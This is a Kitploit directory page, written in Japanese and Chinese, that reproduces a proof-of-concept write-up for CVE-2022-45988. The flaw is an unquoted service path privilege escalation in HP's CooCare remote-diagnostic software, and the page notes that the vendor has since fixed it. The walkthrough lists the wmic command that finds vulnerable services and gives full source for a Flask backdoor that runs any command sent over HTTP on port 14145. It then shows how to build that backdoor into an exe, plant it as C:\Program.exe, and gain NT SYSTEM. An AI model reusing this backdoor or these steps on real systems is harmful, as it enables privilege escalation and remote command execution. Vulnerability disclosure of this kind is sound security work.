Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-45988 — CVE-2022-45988 StarSoftComm HP CooCare 特権昇格の脆弱性が存在します。 | Kitploit
ツール/GitHubGitHub/happy0717/cve-2022-45988
特権昇格脆弱性分析エクスプロイトペネトレーションテストバイナリエクスプロイト
GitHubhappy0717/cve-2022-45988

CVE-2022-45988

CVE-2022-45988 StarSoftComm HP CooCare 特権昇格の脆弱性が存在します。

リポジトリを見る
33年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-45988 StarSoftComm HP CooCare 権限昇格の脆弱性が存在します

####################################################

私はhp-security-alertに連絡しました。彼らはこのバグを修正しました。StarSoftComm CooCareについて [HP-PSRT-IR #4106]
image
ベンダーから以下の情報が提供されました:

以下の手順で更新してください:

  1. eServiceを起動
  2. 約3分待つ
  3. eServiceを閉じて再度起動
  4. バージョンがv5.364以降であることを確認

#####################################

StarSoftComm HP CooCare に権限昇格の脆弱性が存在し、攻撃者が特権レベルを昇格させる可能性があります。 e管家超级版是HP星14 pro 自带的一款远程诊断软件,该软件为StarSoftComm(软通科技)旗下产品

test on windows 11 22621.819 HP LAPTOP HP Pavilion Plus 14 英寸笔记本电脑 14-eh0000 (56D77AV)

影響を受けるバージョン: CooCare v5.364 未満

#脆弱性の再現

#最初のステップ: wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """
(使用上述CMD命令找到未引用的服务)

image

サービス名は Windows Application Management Service = AKA = WinAppMgmt
服务的名称叫做Windows Application Management Service 简称是WinAppMgmt

image

このサービスはStarSoftComm CooCareからのものです。

image

#ステップ2: 悪意のあるプログラムを準備する

image

root@kitploit:~
from flask import Flask, request
import os

app = Flask(__name__)

@app.route('/')
def hello_world():
    r = request.args.getlist('cmd')  #Reception? cmd= parameter
    a=os.popen(r[0])  #Execute system commands
    l = a.read()
    return l  #return

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=14145, debug=True)  #Listen HTTP port 14145

python3 flaskを使用して悪意のあるexeを作成しました。HTTPポート14145をリッスンし、システムコマンドを実行できます。

コマンド pyinstaller.exe --onefile --windowed -F -w python_test.py を使用して悪意のあるexeを作成します。

#ステップ3: マルウェアをパス C:\ に配置し、名前を Program.exe に変更する

image

#ステップ4: Windows Application Management Service を起動する

Windows Application Management Service が既に起動している場合は、再起動してください。

image

#ステップ5: Windows Application Management Service の起動を待ち、システムコマンドを実行する C:\Program.exe が system として実行されます

Taskmgr.exe で Windows Application Management Service が SYSTEM として起動するのを確認したら、ブラウザを開いて http://127.0.0.1:14145?cmd=whoami と入力します。

待つ..........

for...

it.

NT SYSTEM

image

ツールをダウンロード